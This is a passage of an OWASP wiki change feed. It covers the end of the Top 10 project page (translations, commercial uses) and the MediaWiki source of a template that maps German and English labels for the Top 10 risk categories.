*Vietnamese: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASPTop%2010%20-%202010%20Vietnamese.pdf OWASP Top 10 2010 - Vietnamese PDF] Translation lead by Cecil Su - Translation Team: Dang Hoang Vu, Nguyen Ba Tien, Nguyen Tang Hung, Luong Dieu Phuong, Huynh Thien Tam&lt;br /&gt;
*Hebrew: [[OWASP_Top10_Hebrew|OWASP Top 10 Hebrew Project]] -- [https://www.owasp.org/images/c/cd/OWASP_Top_10_Heb.pdf OWASP Top 10 2010 - Hebrew PDF]. Lead by Or Katz, see translation page for list of contributors.&lt;br /&gt;
&lt;br /&gt;
= Project Details =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{:GPC_Project_Details/OWASP_Top10 | OWASP Project Identification Tab}}&lt;br /&gt;
&lt;br /&gt;
= Some Commercial &amp;amp; OWASP Uses of the Top 10 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Warning''': these articles have not been rated for accuracy by OWASP. Product companies should be extremely careful about claiming to &amp;quot;cover&amp;quot; or &amp;quot;ensure compliance&amp;quot; with the OWASP Top 10. The current state-of-the-art for automated detection (scanners and static analysis) and prevention (WAF) is nowhere near sufficient to claim adequate coverage of the issues in the Top 10. Nevertheless, using the Top 10 as a simple way to communicate security to end users is effective. &lt;br /&gt;
&lt;br /&gt;
;[https://blogs.microsoft.com/microsoftsecure/2008/05/01/sdl-and-the-owasp-top-ten/ Microsoft] &lt;br /&gt;
:as a way to measure the coverage of their SDL and improve security&lt;br /&gt;
&lt;br /&gt;
;[https://www.pcisecuritystandards.org/index.shtml PCI Council] &lt;br /&gt;
:as part of the Payment Card Industry Data Security Standard (PCI DSS)&lt;br /&gt;
&lt;br /&gt;
;[http://msdn.microsoft.com/en-us/library/dd129898.aspx Microsoft] &lt;br /&gt;
:to show how &amp;quot;T10 threats are handled by the security design and test procedures of Microsoft&amp;quot;&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Top_10/Mapping_to_WHID | OWASP]]&lt;br /&gt;
:OWASP Top 10 Mapped to the Web Hacking Incident Database&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Mobile_Security_Project#tab=Top_Ten_Mobile_Risks | OWASP]]&lt;br /&gt;
:OWASP Mobile Top 10 Risks&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Top_Ten_Cheat_Sheet | OWASP]]&lt;br /&gt;
:OWASP Top 10 Cheat Sheet&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project]] [[Category:OWASP_Document]] [[Category:OWASP_Download]] [[Category:OWASP_Release_Quality_Document]][[Category:Popular]][[Category:SAMM-EG-1]]&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Template:Top_10:LanguageFile&amp;diff=230575</id>
		<title>Template:Top 10:LanguageFile</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Template:Top_10:LanguageFile&amp;diff=230575"/>
				<updated>2017-06-13T02:25:10Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;!----------------------------------------------------------------------------&amp;gt; &lt;br /&gt;
&amp;lt;!-- This File contains all the text that is used by OWASP Top 10 Templates --&amp;gt;&lt;br /&gt;
&amp;lt;!--             Please add a new language solely here!!!                   --&amp;gt;&lt;br /&gt;
&amp;lt;!----------------------------------------------------------------------------&amp;gt;&lt;br /&gt;
==='''Usage:''' ===&lt;br /&gt;
This File contains all the text that is used by OWASP Top 10 Templates&amp;lt;br/&amp;gt;&lt;br /&gt;
Please leave a message to {{Template:Contact | name = Torsten Gigler | email =torsten.gigler@owasp.org | username = T.Gigler}} &lt;br /&gt;
if you liked to add a new localization&amp;lt;br&amp;gt;                     &lt;br /&gt;
&amp;lt;!---       Please add a new language solely here!!!                   --&amp;gt;&lt;br /&gt;
If you use an undefined language you will get English output (default language).&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;{{Top_10:LanguageFile&amp;lt;/nowiki&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
:&amp;lt;nowiki&amp;gt;  |text=&amp;lt;parameter&amp;gt; &amp;lt;!-- take one of the defined parmeters, e.g. tableOfContents --&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
:&amp;lt;nowiki&amp;gt;  |language=&amp;lt;your language&amp;gt;   &amp;lt;!-- actually only English (=en) and German (=de) are valid parameters) --&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
:&amp;lt;nowiki&amp;gt;  |year=&amp;lt;year&amp;gt;   &amp;lt;!-- optional for some texts --&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;}}&amp;lt;/nowiki&amp;gt;&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
====Example:====&lt;br /&gt;
&amp;lt;nowiki&amp;gt;{{Top_10:LanguageFile|text=tableOfContents|language=de}} =&amp;gt;&amp;lt;/nowiki&amp;gt; {{Top_10:LanguageFile|text=tableOfContents|language=de}}&lt;br /&gt;
----&lt;br /&gt;
==='''Healthcheck'''===&lt;br /&gt;
tbd.&amp;lt;br/&amp;gt;&lt;br /&gt;
In the meantime, please check:&lt;br /&gt;
* [[Top_10_2013-Table_of_Contents | English Top 10 Wiki]]&lt;br /&gt;
* [[Germany/Projekte/Top_10-2013-Inhaltsverzeichnis | German Top 10 Wiki]]&lt;br /&gt;
----&lt;br /&gt;
If you use an unknown parameter you will get the following Error message in your wiki page:&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;!---       Please add a new language solely here!!!                   --&amp;gt;&lt;br /&gt;
&amp;lt;onlyinclude&amp;gt;{{#switch: {{{language}}}&lt;br /&gt;
   | de = &amp;lt;!-- German --&amp;gt;&lt;br /&gt;
     {{#switch: {{{text}}} &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN Document-Root --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | documentRootTop10 =                 Germany/Projekte/Top 10-{{{year}}}&lt;br /&gt;
        | documentRootTop10DeveloperEdition = Germany/Projekte/Top 10 fuer Entwickler-{{{year}}}&amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END Document-Root --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Top Ten Section for Top 10 2013-CenterLinkTemplate + Top 10 2013:Top and Bottom(Advanced)Template(s) --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | top10TmpMessage =               ==BAUSTELLE! Hier entsteht das deutsche Wiki der OWASP Top 10-2013==&lt;br /&gt;
        | top10TmpMessageDeveloperEdition = ==BAUSTELLE! Hier entsteht das deutsche Wiki der OWASP Top 10 fuer Entwickler-2013==&lt;br /&gt;
        | centerLink1 =                   [[Germany/Projekte/Top 10-2013-Inhaltsverzeichnis|2013 Inhaltsverzeichnis]]&lt;br /&gt;
        | centerLink2 =                   [[Germany/Projekte/Top 10-2013-Top 10|2013 Die Top-10-Risiken]]&lt;br /&gt;
        | centerLink1DeveloperEdition =   [[Germany/Projekte/Top 10 fuer Entwickler-2013/Inhaltsverzeichnis|Top 10 fuer Entwickler-2013: Inhaltsverzeichnis]]&lt;br /&gt;
        | centerLink2DeveloperEdition =   [[Germany/Projekte/Top 10 fuer Entwickler-2013/Top 10|Die Top-10-Risiken]]&lt;br /&gt;
        | projectCategory =               [[Category: Germany/Projekte/Top 10-2013]]&lt;br /&gt;
        | projectCategoryDeveloperEdition = [[Category:OWASP Top 10 fuer Entwickler]] [[Category: Germany/Projekte/Top 10 fuer Entwickler-2013]]&amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Top Ten Section for Top 10 2013-CenterLinkTemplate --&amp;gt; &lt;br /&gt;
        &amp;lt;!-- BEGIN main Document --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | tableOfContents =               Inhaltsverzeichnis&lt;br /&gt;
        | foreword =                      Vorwort&lt;br /&gt;
        | forewordTranslation =           Vorwort der deutschen Übersetzung&lt;br /&gt;
        | forward =                       Vorwort &amp;lt;!--- behobener Fehler im englischen Original ---&amp;gt;&lt;br /&gt;
        | forwardTranslation =            Vorwort der deutschen Übersetzung &amp;lt;!--- behobener Fehler im englischen Original ---&amp;gt;&lt;br /&gt;
        | aboutOWASP =                    Über OWASP&lt;br /&gt;
        | copyrightAndLicense             Copyright und Lizenz&lt;br /&gt;
        | introduction =                  Einleitung&lt;br /&gt;
        | releaseNotes =                  Neuerungen&lt;br /&gt;
        | risks =                         Risiken&lt;br /&gt;
        | risk =                          Risiko&lt;br /&gt;
        | subTitleApplicationRisks =      (Sicherheitsrisiken für Anwendungen)&lt;br /&gt;
        | riskLarge =                     RISIKO&lt;br /&gt;
        | applicationSecurityRisks =      Was sind Sicherheitsrisiken für Anwendungen? &lt;br /&gt;
        | theTop10 =                      Die Top-10-Risiken&lt;br /&gt;
        | top10 =                         Top 10&lt;br /&gt;
        | whatsNextforDevelopers =        Nächste Schritte für Software-Entwickler&lt;br /&gt;
        | whatsNextforVerifiers =         Nächste Schritte für Prüfer&lt;br /&gt;
        | whatsNextforOrganizations =     Nächste Schritte für Organisationen&lt;br /&gt;
        | noteAboutRisks =                Anmerkungen zum Risikobegriff&lt;br /&gt;
        | detailsAboutRiskFactors =       Details zu Risiko-Faktoren&lt;br /&gt;
        | appendix =                      Anlage&lt;br /&gt;
        | warnings =                      Zur Beachtung&lt;br /&gt;
        | acknowledgements =              Danksagung&lt;br /&gt;
        | attribution =                   Namensnennung/Danksagung&lt;br /&gt;
        | whatChangedFrom2010to2013 =     Was hat sich von Version 2010 zu 2013 verändert?&lt;br /&gt;
        | welcome =                       Herzlich Willkommen&lt;br /&gt;
        | whatAreApplicationSecurityRisks =          Was sind Sicherheitsrisiken für Anwendungen?&lt;br /&gt;
        | whatsMyRisk =                   Was sind &amp;lt;u&amp;gt;meine&amp;lt;/u&amp;gt; Risiken?&lt;br /&gt;
        | references =                    Referenzen&lt;br /&gt;
        | establishAndUseAFullSetOfCommonSecurityControls = Etablierung und Nutzung umfassender Sicherheitsmaßnahmen&lt;br /&gt;
        | startYourApplicationSecurityProgramNow =   Starten Sie jetzt mit Ihrem Anwendungssicherheits-Programm!&lt;br /&gt;
        | getOrganized =                  Organisation und Prozesse &lt;br /&gt;
        | codeReview =                    Code-Analyse&lt;br /&gt;
        | securityAndPenetrationTesting = Sicherheits- und Penetrationstests&lt;br /&gt;
        | itsAboutRisksNotWeaknesses =    Es geht nicht um Schwachstellen, sondern um Risiken&lt;br /&gt;
        | top10RiskFactorSummary =        Zusammenfassung der Top 10 Risiko-Faktoren&lt;br /&gt;
        | additionalRisksToConsider =     Weitere zu betrachtende Risiken &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END main Document --&amp;gt; &lt;br /&gt;
        &amp;lt;!-- BEGIN of Top Ten Section for ByTheNumbersTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | injection =                     Injection&lt;br /&gt;
        | brokenAuthSessionMgmt =         Fehler in Authentifizierung und Session-Management&lt;br /&gt;
        | authentication =                Authentifizierung &amp;lt;!-- short form for 'Broken Authentication and Session Management' ---&amp;gt;&lt;br /&gt;
        | xss =                           Cross-Site Scripting (XSS)&lt;br /&gt;
        | xssShort =                      XSS&lt;br /&gt;
        | insecureDirectObjectReference = Unsichere direkte Objektreferenzen&lt;br /&gt;
        | insecureDOR =                   Unsichere direkte Objektreferenzen&lt;br /&gt;
        | securityMisconfig =             Sicherheitsrelevante Fehlkonfiguration&lt;br /&gt;
        | misconfig =                     Fehlkonfiguration&lt;br /&gt;
        | sensitiveDataExposure =         Verlust der Vertraulichkeit sensibler Daten&amp;lt;noinclude&amp;gt;ex: Sensitive Data Exposure&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | sensData =                      Sens. Data&amp;lt;noinclude&amp;gt;(tbd)&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | missingFunctionLevelACL =       Fehlerhafte Autorisierung auf Anwendungsebene &amp;lt;noinclude&amp;gt;(tbd = Missing Function Level Access Control)&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | functionAcc =                   Fehlerh. Autorisierung&amp;lt;noinclude&amp;gt;(tbd = Kurzform für Missing Function Level Access Control)&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | csrf =                          Cross-Site Request Forgery (CSRF)&lt;br /&gt;
        | csrfShort =                     CSRF&lt;br /&gt;
        | usingVulnerableComponents =     Benutzen von Komponenten mit bekannten Schwachstellen &amp;lt;noinclude&amp;gt;(tbd = Using Components with Known Vulnerabilities)&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | vulnComponents =                Komponenten mit Schwachstellen &amp;lt;noinclude&amp;gt;(tbd = vuln. Components)&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | unvalidatedRedirectsForwards =  Ungeprüfte Um- und Weiterleitungen&lt;br /&gt;
        | unvalRedirects =                Ungepr. Weiterltg.&lt;br /&gt;
        | insecureCryptographicStorage =  Kryptografisch unsichere Speicherung&lt;br /&gt;
        | failureRestrictUrlAccess =      Mangelhafter URL-Zugriffsschutz&lt;br /&gt;
        | insufficientTLProtection =      Unzureichende Absicherung der Transportschicht&lt;br /&gt;
        | inProgress =                    In Arbeit &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Top Ten Section for ByTheNumbersTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for Top 10:SummaryTableTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | applicationSpecific =           Anwendungs-&amp;lt;br&amp;gt;spezifisch&lt;br /&gt;
        | appSpecific =                   Anw.-&amp;lt;br&amp;gt;spezifisch&lt;br /&gt;
        | applicationBusinessSpecific =   Anwendungs-/&amp;lt;br&amp;gt;Geschäftsspezifisch&lt;br /&gt;
        | appBusinessSpecific =           Anw.-/&amp;lt;br&amp;gt;Geschäftsspez. &lt;br /&gt;
        | exploitability =                Ausnutzbarkeit&lt;br /&gt;
        | easy =                          EINFACH&lt;br /&gt;
        | average =                       DURCHSCHNITTLICH&lt;br /&gt;
        | difficult =                     SCHWIERIG&lt;br /&gt;
        | weakness =                      &amp;lt;!-- not used ---&amp;gt; &amp;lt;!-- for table in Top_10_2013-Risk --&amp;gt;&lt;br /&gt;
        | prevalence =                    Verbreitung&lt;br /&gt;
        | veryWidespread =                AUSSERGEWÖHNLICH HÄUFIG&lt;br /&gt;
        | widespread =                    SEHR HÄUFIG&lt;br /&gt;
        | common =                        HÄUFIG&lt;br /&gt;
        | uncommon =                      SELTEN&lt;br /&gt;
        | detectability =                 Auffindbarkeit&lt;br /&gt;
        | impact =                        Auswirkung&lt;br /&gt;
        | severe =                        SCHWERWIEGEND&lt;br /&gt;
        | moderate =                      MITTEL&lt;br /&gt;
        | minor =                         GERING  &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Section for Top 10:SummaryTableTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for SummaryTableHeaderBeginTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | threatAgents =                  Bedrohungsquelle&lt;br /&gt;
        | attackVectors =                 Angriffsvektor&lt;br /&gt;
        | securityWeakness =              Schwachstellen&lt;br /&gt;
        | technicalImpacts =              Technische Auswirkung&lt;br /&gt;
        | businessImpacts =               Auswirkung auf das Unternehmen&lt;br /&gt;
        | threatAgentsImage =             Image:Top 10 de threatAgents.png&lt;br /&gt;
        | attackVectorsImage =            Image:Top 10 de attackVectors.png&lt;br /&gt;
        | securityWeaknessImage=          Image:Top 10 de securityWeakness.png&lt;br /&gt;
        | technicalImpactsImage =         Image:Top 10 de technicalImpacts.png &lt;br /&gt;
        | businessImpactsImage =          Image:Top 10 de businessImpacts.png  &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Section for SummaryTableHeaderBeginTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for other Images --&amp;gt;        &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | applicationSecurityRisksImage = Image:Top 10 de ApplicationSecurityRisks.png &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Section for other Images --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for SubsectionAdvancedTemplate --&amp;gt;          &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | vulnerableTo =                  Bin ich durch {{Top_10_2010:ByTheNumbers|{{{risk}}}|year={{{year}}}|language={{{language}}} }} verwundbar?&lt;br /&gt;
        | vulnerableTo1 =                 Bin ich durch&lt;br /&gt;
        | vulnerableTo2 =                 &amp;amp;nbsp;verwundbar?&lt;br /&gt;
        | howPrevent =                    Wie kann ich {{Top_10_2010:ByTheNumbers|{{{risk}}}|year={{{year}}}|language={{{language}}} }} verhindern?&lt;br /&gt;
        | howPrevent1 =                   Wie kann ich &lt;br /&gt;
        | howPrevent2 =                   &amp;amp;nbsp;verhindern?&lt;br /&gt;
        | exampleScenarios =              Mögliche Angriffsszenarien &lt;br /&gt;
        | defendingOption =               Verteidigungs-Option&lt;br /&gt;
        | against =                       gegen&lt;br /&gt;
        | userImpact =                    Auswirkung(en) auf den Benutzer &amp;lt;noinclude&amp;gt;&amp;lt;!-- not used, yet --&amp;gt;   &lt;br /&gt;
        &amp;lt;!-- END of Section for SubsectionAdvancedTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of SubSubsectionExternalReferencesTemplate --&amp;gt;         &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | external =                      Andere                    &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of SubSubsectionExternalReferencesTemplate --&amp;gt;   &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | myUnused =                      FEHLER im 'Language File' (Aufruf des unbenutzten Objekts)&lt;br /&gt;
        | #default =                      FEHLER im 'Language File' (Aufruf des unbekannten Objekts)&lt;br /&gt;
     }} &amp;lt;!-- End of German --&amp;gt;&lt;br /&gt;
&amp;lt;noinclude&amp;gt;&lt;br /&gt;
&amp;lt;!-- English = default; so here is nothing to do --&amp;gt; &lt;br /&gt;
&amp;lt;!-- | en =  --&amp;gt;&lt;br /&gt;
&amp;lt;!-- | us =  --&amp;gt;&lt;br /&gt;
&amp;lt;!-- | gb =  --&amp;gt;&lt;br /&gt;
&amp;lt;/noinclude&amp;gt; | #default = &amp;lt;!-- English --&amp;gt;&lt;br /&gt;
     {{#switch: {{{text}}} &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN Document-Root --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | documentRootTop10 =                 Top 10 {{{year}}}&lt;br /&gt;
        | documentRootTop10DeveloperEdition = Top 10 {{{year}}} Developer Edition&amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END Document-Root --&amp;gt;  &lt;br /&gt;
        &amp;lt;!-- BEGIN of Top Ten Section for Top 10 2013-CenterLinkTemplate + Top 10 2013:Top and Bottom(Advanced)Template(s) --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | top10TmpMessage = &lt;br /&gt;
           {{#switch: {{{year}}} &lt;br /&gt;
             | 2017 =               ==The Top 10-2017 Wiki is under Construction. The Content is Not Finished yet.==&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;==Edits to this page will be lost. If you wish a change, please file an [https://github.com/OWASP/Top10/issues issue on GitHub]. ==&lt;br /&gt;
             | 2013 =               &amp;lt;noinclude&amp;gt;==The Top 10-2013 Wiki is under Construction. The Content is Not Finished yet==&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
           }}&lt;br /&gt;
        | top10TmpMessageDeveloperEdition =   ==The Top 10-2013 Developer Edition Wiki is under Connstruction. The Content is Not Finished yet==&lt;br /&gt;
        | centerLink1 =                   [[Top 10 {{{year}}}-Table of Contents | {{{year}}} Table of Contents]]&lt;br /&gt;
        | centerLink2 =                   [[Top_10_{{{year}}}-Top 10|{{{year}}} Top 10 List]]&lt;br /&gt;
        | centerLink1DeveloperEdition =   [[Top 10 {{{year}}} Developer Edition-Table of Contents|{{{year}}} Developer Edition-Table of Contents]]&lt;br /&gt;
        | centerLink2DeveloperEdition =   [[Top 10 {{{year}}} Developer Edition-Top 10 List|{{{year}}} Developer Edition-Top 10 List]]&lt;br /&gt;
        | projectCategory =               [[Category:OWASP Top Ten Project]] [[Category:OWASP Top Ten {{{year}}} Project]]&lt;br /&gt;
        | projectCategoryDeveloperEdition = [[Category:OWASP Top Ten {{{year}}} Developer Edition]]&amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN main Document --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | tableOfContents =               Table of Contents&lt;br /&gt;
        | foreword =                      Foreword&lt;br /&gt;
        | forewordTranslation =           Foreword of the English Wiki&lt;br /&gt;
        | forward =                       Forward &amp;lt;!--- looks like a repaired issue ---&amp;gt;&lt;br /&gt;
        | forwardTranslation =            Forward of the English Wiki &amp;lt;!--- looks like a repaired issue ---&amp;gt;&lt;br /&gt;
        | aboutOWASP =                    About OWASP&lt;br /&gt;
        | copyrightAndLicense             Copyright and License&lt;br /&gt;
        | introduction =                  Introduction&lt;br /&gt;
        | releaseNotes =                  Release Notes&lt;br /&gt;
        | risks =                         Risks&lt;br /&gt;
        | risk =                          Risk&lt;br /&gt;
        | subTitleApplicationRisks =      (Application Security Risks)&lt;br /&gt;
        | riskLarge =                     RISIK&lt;br /&gt;
        | applicationSecurityRisks =      Application Security Risks&lt;br /&gt;
        | theTop10 =                      The Top 10&lt;br /&gt;
        | top10 =                         Top 10&lt;br /&gt;
        | whatsNextforDevelopers =        What's Next for Developers&lt;br /&gt;
        | whatsNextforVerifiers =         What's Next for Verifiers&lt;br /&gt;
        | whatsNextforSecurityTesting =   What's Next for Security Testing&lt;br /&gt;
        | whatsNextforOrganizations =     What's Next for Organizations&lt;br /&gt;
        | noteAboutRisks =                Note About Risks&lt;br /&gt;
        | OWASPTop10ApplicationSecurityRisks = OWASP Top 10 Application Security Risks&lt;br /&gt;
        | detailsAboutRiskFactors =       Details About Risk Factors&lt;br /&gt;
        | appendix =                      appendix&lt;br /&gt;
        | warnings =                      Warnings&lt;br /&gt;
        | acknowledgements =              Acknowledgements&lt;br /&gt;
        | attribution =                   Attribution&lt;br /&gt;
        | whatChangedFrom2010to2013 =     What Changed From 2010 to 2013?&lt;br /&gt;
        | welcome =                       Welcome&lt;br /&gt;
        | whatAreApplicationSecurityRisks =          What Are Application Security Risks?&lt;br /&gt;
        | whatsMyRisk =                   What's My Risk?&lt;br /&gt;
        | references =                    References&lt;br /&gt;
        | establishAndUseAFullSetOfCommonSecurityControls = Establish &amp;amp; Use Repeatable Security Processes and Standard Security Controls&lt;br /&gt;
        | startYourApplicationSecurityProgramNow =   Start Your Application Security Program Now&lt;br /&gt;
        | establishContinuousApplicationSecurityTesting = Establish Continuous Application Security Testing&lt;br /&gt;
        | getOrganized =                  Get Organized&lt;br /&gt;
        | codeReview =                    Code Review&lt;br /&gt;
        | securityAndPenetrationTesting = Security and Penetration Testing&lt;br /&gt;
        | itsAboutRisksNotWeaknesses =    It's About Risks, Not Weaknesses&lt;br /&gt;
        | top10RiskFactorSummary =        Top 10 Risk Factor Summary&lt;br /&gt;
        | additionalRisksToConsider =     Additional Risks to Consider  &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END main Document --&amp;gt; &lt;br /&gt;
        &amp;lt;!-- BEGIN of Top Ten Section for ByTheNumbersTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | injection =                     Injection&lt;br /&gt;
        | brokenAuthSessionMgmt =         Broken Authentication and Session Management&lt;br /&gt;
        | authentication =                Authentication &amp;lt;!-- short form for 'Broken Authentication and Session Management' ---&amp;gt;&lt;br /&gt;
        | xss =                           Cross-Site Scripting (XSS)&lt;br /&gt;
        | xssShort =                      XSS&lt;br /&gt;
        | insecureDirectObjectReference = Insecure Direct Object References&lt;br /&gt;
        | insecureDOR =                   Insecure DOR&lt;br /&gt;
        | securityMisconfig =             Security Misconfiguration&lt;br /&gt;
        | misconfig =                     Misconfig&lt;br /&gt;
        | sensitiveDataExposure =         Sensitive Data Exposure&lt;br /&gt;
        | sensData =                      Sens. Data&lt;br /&gt;
        | missingFunctionLevelACL =       Missing Function Level Access Control&lt;br /&gt;
        | functionAcc =                   Function Acc.&lt;br /&gt;
        | csrf =                          Cross-Site Request Forgery (CSRF)&lt;br /&gt;
        | csrfShort =                     CSRF&lt;br /&gt;
        | usingVulnerableComponents =     Using Components with Known Vulnerabilities&lt;br /&gt;
        | vulnComponents =                vuln. Components&lt;br /&gt;
        | unvalidatedRedirectsForwards =  Unvalidated Redirects and Forwards&lt;br /&gt;
        | unvalRedirects =                unval. Redirects&lt;br /&gt;
        | insecureCryptographicStorage =  Insecure Cryptographic Storage&lt;br /&gt;
        | failureRestrictUrlAccess =      Failure to Restrict URL Access&lt;br /&gt;
        | insufficientTLProtection =      Insufficient Transport Layer Protection&lt;br /&gt;
        | brokenAccessControl =           Broken Access Control &lt;br /&gt;
        | insufficientAttackPrevention =  Insufficient Attack Protection &lt;br /&gt;
        | underprotectedAPIs =            Underprotected APIs&lt;br /&gt;
        | accessCtrl =                    Access Ctrl&lt;br /&gt;
        | attackProt  =                   Attack Prot.&lt;br /&gt;
        | ApiProt =                       API Prot.&lt;br /&gt;
        | inProgress =                    In Progress &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Top Ten Section for ByTheNumbersTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for Top 10:SummaryTableTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | applicationSpecific =           Application Specific&lt;br /&gt;
        | appSpecific =                   App Specific&lt;br /&gt;
        | applicationBusinessSpecific =   Application / Business Specific  &lt;br /&gt;
        | appBusinessSpecific =           App / Business Specific       &lt;br /&gt;
        | exploitability =                Exploitability&lt;br /&gt;
        | easy =                          EASY&lt;br /&gt;
        | average =                       AVERAGE&lt;br /&gt;
        | difficult =                     DIFFICULT&lt;br /&gt;
        | weakness =                      Weakness &amp;lt;!-- for table in Top_10_2013-Risk --&amp;gt; &lt;br /&gt;
        | prevalence =                    Prevalence&lt;br /&gt;
        | veryWidespread =                VERY WIDESPREAD&lt;br /&gt;
        | widespread =                    WIDESPREAD&lt;br /&gt;
        | common =                        COMMON&lt;br /&gt;
        | uncommon =                      UNCOMMON&lt;br /&gt;
        | detectability =                 Detectability&lt;br /&gt;
        | impact =                        Impact&lt;br /&gt;
        | severe =                        SEVERE&lt;br /&gt;
        | moderate =                      MODERATE&lt;br /&gt;
        | minor =                         MINOR &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Section for Top 10:SummaryTableTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for SummaryTableHeaderBeginTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | threatAgents =                  Threat Agents&lt;br /&gt;
        | attackVectors =                 Attack Vectors&lt;br /&gt;
        | securityWeakness =              Security Weakness&lt;br /&gt;
        | technicalImpacts =              Technical Impacts&lt;br /&gt;
        | businessImpacts =               Business Impacts&lt;br /&gt;
        | threatAgentsImage =             Image:Top 10 threatAgents.png&lt;br /&gt;
        | attackVectorsImage =            Image:Top 10 attackVectors.png&lt;br /&gt;
        | securityWeaknessImage=          Image:Top 10 securityWeakness.png&lt;br /&gt;
        | technicalImpactsImage =         Image:Top 10 technicalImpacts.png &lt;br /&gt;
        | businessImpactsImage =          Image:Top 10 businessImpacts.png &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Section for SummaryTableHeaderBeginTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for other Images --&amp;gt;        &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | applicationSecurityRisksImage = Image:Top_10_2013-appsec-risks.png &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Section for other Images --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for SubsectionAdvancedTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
